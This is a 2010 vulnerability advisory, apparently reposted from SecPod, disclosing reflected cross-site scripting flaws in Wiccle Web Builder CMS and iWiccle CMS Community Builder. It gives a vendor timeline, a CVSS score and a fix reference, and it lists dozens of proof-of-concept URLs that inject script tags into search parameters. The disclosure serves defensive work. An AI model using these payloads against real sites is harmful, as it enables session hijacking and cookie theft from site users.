Home / os / win7

wwbcms-xss.txt

Posted on 22 October 2010

##############################################################################
Wiccle Web Builder CMS and iWiccle CMS Community Builder Multiple Cross-Site
Scripting Vulnerability.

SecPod Technologies (www.secpod.com)
Author Veerendra G.G
###############################################################################

SecPod ID:      1005                            09/07/2010 Issue Discovered
09/10/2010 Vendor Notified
09/13/2010 Vendor Confirmed
09/14/2010 Fix Available


Class: Cross-Site Scripting                     Severity: Medium


Overview:
---------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site Scripting Vulnerabilities.


Technical Description:
----------------------
Wiccle Web Builder CMS and iWiccle CMS Community Builder is prone to multiple
Cross-Site vulnerabilities because it fails to properly sanitize user-supplied input.

NOTE: Vulnerability is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

1) Input passed via the 'member_city' parameter to 'index.php' when 'module' is
set to 'dating' and 'show' is set to 'member_search' is not properly verified
before it is returned to the user.

NOTE: This vulnerability exists only in Wiccle Web Builder CMS

POC:
* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30


2) Input passed via the 'post_name', 'post_text', 'post_tag', 'post_member_name'
parameter to 'index.php' when 'module' is set to various (Auctions, Audio etc.,)
options and 'show' is set to 'post_search' is not properly verified before
it is returned to the user.

NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
* http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

* http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>


3) Input passed via the 'member_username', 'member_tags' parameter to 'index.php'
when 'module' is set to 'members' and 'show' is set to 'member_search' is not
properly verified before it is returned to the user.

NOTE: This vulnerability exists in both the products (Wiccle Web Builder CMS
and iWiccle CMS Community Builder).

POC:
* http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

* http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


These can be exploited to execute arbitrary HTML and script code in a user's
browser session in the context of a vulnerable site. This may allow an attacker
to steal cookie-based authentication and launch further attacks.

The exploit has been tested in Wiccle Web Builder CMS 2.0 (wwb_101.zip) and
iWiccle CMS Community Builder (iwiccle_1211.zip)


Impact:
--------
Successful exploitation could allow an attacker to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.


Affected Software:
------------------
Wiccle Web Builder CMS 2.0 (wwb_101.zip)
iWiccle CMS Community Builder 2.0 (iwiccle_1211.zip)


References:
-----------
http://www.wiccle.com/
http://secpod.org/blog/?p=130
http://wiccle.com/download/wwb_101.zip
http://wiccle.com/download/iwiccle_1211.zip
http://secpod.org/advisories/SECPOD_Wiccle_Web_Builder_and_iWiccle_CMS_Community_Builder.txt
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Proof of Concepts:
-----------------
NOTE: It is exploitable, when magic_quotes_gpc is Off (magic_quotes_gpc = Off)

* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30&member_photo=1

* http://<Target_IP>/wwb_101/index.php?module=dating&show=member_search&member_gender=male&member_country=all&member_city=<script>alert('XSS-Test')<%2Fscript>&member_min_age=18&member_max_age=30

* http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

* http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_name=<script>alert('XSS-Test')<%2Fscript>&post_text=<script>alert('XSS-Test')<%2Fscript>&post_tags=<script>alert('XSS-Test')<%2Fscript>&post_member_name=<script>alert('XSS-Test')<%2Fscript>

* http://<Target_IP>/wwb_101/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>

* http://<Target_IP>/iwiccle_1211/index.php?module=members&show=member_search&member_username=<script>alert('XSS-Test')<%2Fscript>&member_tags=<script>alert('XSS-Test')<%2Fscript>


Other POC's:
-------------
http://<Target_IP>/wwb_101/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=articles&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=blogs&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=gallery&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=news&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=store&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=video&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?module=links&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>
http://<Target_IP>/iwiccle_1211/index.php?index.php?module=events&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=downloads&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=guestbook&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=help&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=notebox&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=polls&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=portfolio&show=post_search&post_text=<script>alert('XSS-Test')</script>

http://<Target_IP>/wwb_101/index.php?module=support&show=post_search&post_text=<script>alert('XSS-Test')</script>


Workaround:
-----------
Not available


Solution:
---------
iWiccle CMS Community Builder 1.3.0 (iwiccle_130.zip)
http://www.wiccle.com/news/backstage_news/iwiccle/post/iwiccle_cms_community_builder_130_releas


Risk Factor:
-------------
CVSS Score Report
ACCESS_VECTOR          = NETWORK
ACCESS_COMPLEXITY      = MEDIUM
AUTHENTICATION         = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT       = PARTIAL
AVAILABILITY_IMPACT    = NONE
EXPLOITABILITY         = PROOF_OF_CONCEPT
REMEDIATION_LEVEL      = UNAVAILABLE
REPORT_CONFIDENCE      = CONFIRMED
CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.

 

TOP

Malware :

Exploits :